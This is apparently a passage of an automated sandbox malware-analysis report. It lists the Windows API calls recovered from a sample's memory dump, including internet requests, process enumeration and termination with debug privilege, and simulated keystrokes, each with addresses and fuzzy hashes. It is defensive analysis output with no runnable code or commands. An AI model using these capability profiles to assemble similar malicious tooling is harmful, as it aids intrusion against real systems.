                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 006E8257
                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006E8267
                                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006E8273
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006E8310
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006E8324
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006E8356
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006E838C
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006E8395
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                • Opcode ID: 8b8de0d4136bbafba370b92f13ddcedf7fdb087948877f7ac7b0fa76c5a5177c
                                                                                                                                                                                                                                                                • Instruction ID: b853d72387f06cd189d779f5f7453ed9a5d1df8741c063e7a422ef5aad83057c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b8de0d4136bbafba370b92f13ddcedf7fdb087948877f7ac7b0fa76c5a5177c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD6199B25043459FDB10EF60C8409AEB3EAFF89310F04892EF989D7251EB35E905CB96
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2C94
                                                                                                                                                                                                                                                                  • Part of subcall function 006A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006AD7D1,00000000,00000000,00000000,00000000,?,006AD7F8,00000000,00000007,00000000,?,006ADBF5,00000000), ref: 006A29DE
                                                                                                                                                                                                                                                                  • Part of subcall function 006A29C8: GetLastError.KERNEL32(00000000,?,006AD7D1,00000000,00000000,00000000,00000000,?,006AD7F8,00000000,00000007,00000000,?,006ADBF5,00000000,00000000), ref: 006A29F0
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CA0
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CAB
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CB6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CC1
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CCC
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CD7
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CE2
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CED
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2CFB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: 16eb800bdcc9db27220e0630d8d83e263acc969aadf3040afade471a50d397ef
                                                                                                                                                                                                                                                                • Instruction ID: 2480636e62e1127ee3153409c0342597b5ae6d768a43d625537857cd2ceee47b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16eb800bdcc9db27220e0630d8d83e263acc969aadf3040afade471a50d397ef
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA11B476140109AFCB82FF59D852CDE3BA6BF06B50F4144A8FA485B222D631FE509F95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006EC272
                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006EC29A
                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006EC2CA
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 006EC322
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 006EC336
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 006EC341
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 534321841cdee73a0bd96cbf20d4494e9afd67dbf064f1bc0ad7a32b2873500a
                                                                                                                                                                                                                                                                • Instruction ID: 6b8dc29ae11dd4f7baabd4194764310d4b09079b7dc793e85ce2b8364c37bc74
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 534321841cdee73a0bd96cbf20d4494e9afd67dbf064f1bc0ad7a32b2873500a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4231A0B1501344AFD7229F66CC88AAB7BFEEB49760F14861DF446D3200DB34DD069B65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 006D20AB
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 006D20C0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006D214D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                • Opcode ID: b41218cc65bf28b62434a9ab74909b6c7e2e0f6123a34fe110dccd862d7c2bd5
                                                                                                                                                                                                                                                                • Instruction ID: 68ed46c8bfa399d94d3b2bc990430dafc8b527ab5ceaa0c4279dfb5e14adf831
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b41218cc65bf28b62434a9ab74909b6c7e2e0f6123a34fe110dccd862d7c2bd5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D110AB6A84707B9FA112221DC17DE6779DCF25724F20821BF704A52D2EE6558435618
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                • Opcode ID: 1ba372850e5a2ebedbd1d98db4db577bb0a81392b140a250e39804d6a0edd44c
                                                                                                                                                                                                                                                                • Instruction ID: a5c455049e7455b1a96b77c536fd450dc88ee893fd5376cb2bc9e6dd28625f22
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ba372850e5a2ebedbd1d98db4db577bb0a81392b140a250e39804d6a0edd44c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E6159B2A04301AFDF21BFB89851AAA7B97AF03730F04416EFA5597381D7359D018FA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006C6890
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006C68A9
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006C68B9
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006C68D1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006C68F2
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00688874,00000000,00000000,00000000,000000FF,00000000), ref: 006C6901
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006C691E
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00688874,00000000,00000000,00000000,000000FF,00000000), ref: 006C692D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                • Opcode ID: 83eee9bb4338ece1ca243d5ade8f9222c247673d17612b82696b385c777376f1
                                                                                                                                                                                                                                                                • Instruction ID: 11c1b7d6e4c4fd7440daaefc27349bbe68ec01c10865dc60e74c4faa74f3f2c3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83eee9bb4338ece1ca243d5ade8f9222c247673d17612b82696b385c777376f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73518A70600209EFDB20EF24CC95FAA7BB6FB98750F10861CF906972A0DB75E991DB54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006EC182
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 006EC195
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 006EC1A9
                                                                                                                                                                                                                                                                  • Part of subcall function 006EC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006EC272
                                                                                                                                                                                                                                                                  • Part of subcall function 006EC253: GetLastError.KERNEL32 ref: 006EC322
                                                                                                                                                                                                                                                                  • Part of subcall function 006EC253: SetEvent.KERNEL32(?), ref: 006EC336
                                                                                                                                                                                                                                                                  • Part of subcall function 006EC253: InternetCloseHandle.WININET(00000000), ref: 006EC341
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 337547030-0
                                                                                                                                                                                                                                                                • Opcode ID: 4bde984bd5a0a5102e1fa382b73acccb489b9f2b38515589985090938373ffef
                                                                                                                                                                                                                                                                • Instruction ID: 3f852aab8c719eeacf9336fcba470bb4d767cc59c85f59e8b132b2dc38c49155
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bde984bd5a0a5102e1fa382b73acccb489b9f2b38515589985090938373ffef
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E31A371101781EFDB219FA6DC04AA6BBFAFF14320B00861DFA5683610DB34E9169B64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 006D3A57
                                                                                                                                                                                                                                                                  • Part of subcall function 006D3A3D: GetCurrentThreadId.KERNEL32 ref: 006D3A5E
                                                                                                                                                                                                                                                                  • Part of subcall function 006D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006D25B3), ref: 006D3A65
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006D25BD
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006D25DB
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 006D25DF
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006D25E9
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006D2601
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 006D2605
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006D260F
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006D2623
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 006D2627
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                • Opcode ID: 42bcdcc8216e6f440b01744f77bfa3ac36723d3d482e0630b665d0cd65ee62ee
                                                                                                                                                                                                                                                                • Instruction ID: 78124d093e3c95c5c994b836859b608e8672a83bf00d1a3de96a0930037dff10
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42bcdcc8216e6f440b01744f77bfa3ac36723d3d482e0630b665d0cd65ee62ee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5301D870790214FBFB2167689C8AF593F59DB5EB11F104246F314AF1D1CDE258448AAE
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006DD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 006DD501
                                                                                                                                                                                                                                                                  • Part of subcall function 006DD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 006DD50F
                                                                                                                                                                                                                                                                  • Part of subcall function 006DD4DC: CloseHandle.KERNEL32(00000000), ref: 006DD5DC
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006FA16D
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 006FA180
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006FA1B3
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006FA268
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 006FA273
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006FA2C4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                • Opcode ID: b63b76156d641080ffb7930d799455b8103ac52e8299e6aae97cf7642896fe16
                                                                                                                                                                                                                                                                • Instruction ID: 5aff731c2cb228ab64cf7577421d54f0aa21ffd12b1a4c9f7018611e4f2106aa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b63b76156d641080ffb7930d799455b8103ac52e8299e6aae97cf7642896fe16
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D61B0B02042429FD710DF58C494F69BBE2AF44318F18C58CE56A4B7A3C776ED45CB96
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00692D4B
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00692D53
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00692DE1
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00692E0C
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00692E61
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: &Hi$csm
                                                                                                                                                                                                                                                                • API String ID: 1170836740-3182968335
                                                                                                                                                                                                                                                                • Opcode ID: 909f681e87e1e587ee92a4b9eb82afdf5526e11797724bdb8d726598732fcb99
                                                                                                                                                                                                                                                                • Instruction ID: 3205d1a90cf8b17c2e74eb8b6ecceb0443587f409363a963727d850fb2be1d8c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 909f681e87e1e587ee92a4b9eb82afdf5526e11797724bdb8d726598732fcb99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A941A434A0121AABCF10DF68C855ADEBBBABF44324F148159E8146B792D7359A45CBD0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 006DC913
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconLoad
                                                                                                                                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                • Opcode ID: e9d624c311c0e71f7b73fe18215acae04106180f67581b12c18cb07225661f46
                                                                                                                                                                                                                                                                • Instruction ID: 52e4f56932625c58140859cf7a9a9701aba3c97470f322aa8a4e4dc35698d684
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9d624c311c0e71f7b73fe18215acae04106180f67581b12c18cb07225661f46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA110D31E8930FBAEB015B55DC93CEA679DDF15374B50412FF504AA382EF745D029268
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
